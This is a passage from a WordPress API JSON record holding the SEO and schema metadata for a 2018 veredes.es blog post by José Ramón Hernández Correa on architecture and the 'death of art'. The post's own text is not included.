Correa\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-96x96.jpg\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-96x96.jpg\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-96x96.jpg\",\"caption\":\"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\"},\"description\":\"Nac\u00ed en 1960. Arquitecto por la ETSAM, 1985. Doctor Arquitecto por la Universidad Polit\u00e9cnica de Madrid, 1992. Soy, en el buen sentido de la palabra, bueno. Ahora estoy algo cansado, pero sigo atento y curioso. Arquitecto, bloguero, saxofonero, escritor... pero todo mal.\",\"sameAs\":[\"http:\\\/\\\/arquitectamoslocos.blogspot.com.es\\\/\",\"https:\\\/\\\/www.facebook.com\\\/joseramon.hernandezcorrea\",\"https:\\\/\\\/www.instagram.com\\\/arquitectamoslocos\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/jos-ramn-hernndez-correa-b6378b2a\\\/\",\"https:\\\/\\\/x.com\\\/https:\\\/\\\/twitter.com\\\/arquitectamos\"],\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/author\\\/arquitectamos\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"[:es]La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:gl]A arquitectura ante a morte da arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:en]The architecture in front of the death of the art | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:] - veredes","description":"Toda la informaci\u00f3n sobre: [:es]La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:gl]A arquitectura ante a morte da arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:en]The architecture in front of the death of the art | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:]","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/","og_locale":"es_ES","og_type":"article","og_title":"[:es]La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:gl]A arquitectura ante a morte da arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:en]The architecture in front of the death of the art | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:] - veredes","og_description":"Toda la informaci\u00f3n sobre: [:es]La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:gl]A arquitectura ante a morte da arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:en]The architecture in front of the death of the art | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:]","og_url":"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/","og_site_name":"veredes, arquitectura y divulgaci\u00f3n","article_publisher":"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","article_author":"https:\/\/www.facebook.com\/joseramon.hernandezcorrea","article_published_time":"2018-09-27T22:01:37+00:00","article_modified_time":"2022-02-09T16:54:35+00:00","og_image":[{"width":915,"height":915,"url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap.jpg","type":"image\/jpeg"}],"author":"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/arquitectamos","twitter_site":"@veredes","twitter_misc":{"Escrito por":"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa","Tiempo de lectura":"20 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/#article","isPartOf":{"@id":"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/"},"author":{"name":"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa","@id":"https:\/\/veredes.es\/blog\/#\/schema\/person\/eefca3204fa5a4349162c2869bee6c49"},"headline":"La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa","datePublished":"2018-09-27T22:01:37+00:00","dateModified":"2022-02-09T16:54:35+00:00","mainEntityOfPage":{"@id":"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/"},"wordCount":3976,"commentCount":1,"publisher":{"@id":"https:\/\/veredes.es\/blog\/#organization"},"image":{"@id":"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/#primaryimage"},"thumbnailUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap.jpg","keywords":["arquitectura","arte","arte contemporaneo","artes pl\u00e1sticas","Bart van der Leck","Bauhaus","bellas artes","constructivismo","constructivismo ruso","dad\u00e1","dada\u00edsmo","De Stijl","escultura","expresionismo","Francisco Javier S\u00e1enz de Oiza","John Cage","Jorge Oteiza","Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa","Marcel Duchamp","Piet Mondrian","pintura","surrealismo","vanguardia"],"articleSection":["faro","slider principal"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/","url":"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/","name":"[:es]La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:gl]A arquitectura ante a morte da arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:en]The architecture in front of the death of the art | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:] - veredes","isPartOf":{"@id":"https:\/\/veredes.es\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/#primaryimage"},"image":{"@id":"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/#primaryimage"},"thumbnailUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap.jpg","datePublished":"2018-09-27T22:01:37+00:00","dateModified":"2022-02-09T16:54:35+00:00","description":"Toda la informaci\u00f3n sobre: [:es]La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:gl]A arquitectura ante a morte da arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:en]The architecture in front of the death of the art | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:]","breadcrumb":{"@id":"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/#primaryimage","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap.jpg","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/09\/La-arquitectura-ante-la-muerte-del-arte-Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-marcel-duchmap.jpg","width":915,"height":915,"caption":"M. Duchamp"},{"@type":"BreadcrumbList","@id":"https:\/\/veredes.es\/blog\/la-arquitectura-ante-la-muerte-del-arte-jose-ramon-hernandez-correa\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/veredes.es\/blog\/"},{"@type":"ListItem","position":2,"name":"[:es]La arquitectura ante la muerte del arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:gl]A arquitectura ante a morte da arte | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:en]The architecture in front of the death of the art | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa[:]"}]},{"@type":"WebSite","@id":"https:\/\/veredes.es\/blog\/#website","url":"https:\/\/veredes.es\/blog\/","name":"veredes, arquitectura y divulgaci\u00f3n","description":"veredes","publisher":{"@id":"https:\/\/veredes.es\/blog\/#organization"},"alternateName":"veredes","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/veredes.es\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/veredes.es\/blog\/#organization","name":"veredes, arquitectura y divulgaci\u00f3n","alternateName":"veredes","url":"https:\/\/veredes.es\/blog\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2021\/12\/veredes-logo-centrado_140x54.png","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2021\/12\/veredes-logo-centrado_140x54.png","width":140,"height":54,"caption":"veredes, arquitectura y divulgaci\u00f3n"},"image":{"@id":"https:\/\/veredes.es\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","https:\/\/x.com\/veredes","https:\/\/instagram.com\/veredes\/","https:\/\/www.linkedin.com\/company\/veredes-arquitectura-y-divulgacion\/","https:\/\/es.pinterest.com\/veredes\/","https:\/\/www.tumblr.com\/veredes"]},{"@type":"Person","@id":"https:\/\/veredes.es\/blog\/#\/schema\/person\/eefca3204fa5a4349162c2869bee6c49","name":"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-96x96.jpg","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-96x96.jpg","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-96x96.jpg","caption":"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa"},"description":"Nac\u00ed en 1960. Arquitecto por la ETSAM, 1985. Doctor Arquitecto por la Universidad Polit\u00e9cnica de Madrid, 1992. Soy, en el buen sentido de la palabra, bueno. Ahora estoy algo cansado, pero sigo atento y curioso. Arquitecto, bloguero, saxofonero, escritor... pero todo mal.","sameAs":["http:\/\/arquitectamoslocos.blogspot.com.es\/","https:\/\/www.facebook.com\/joseramon.hernandezcorrea","https:\/\/www.instagram.com\/arquitectamoslocos\/","https:\/\/www.linkedin.com\/in\/jos-ramn-hernndez-correa-b6378b2a\/","https:\/\/x.com\/https:\/\/twitter.com\/arquitectamos"],"url":"https:\/\/veredes.es\/blog\/author\/arquitectamos\/"}]}},"_links":{"self":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts\/21317","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/users\/33"}],"replies":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/comments?post=21317"}],"version-history":[{"count":0,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts\/21317\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/media\/70358"}],"wp:attachment":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/media?parent=21317"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/categories?post=21317"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/tags?post=21317"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}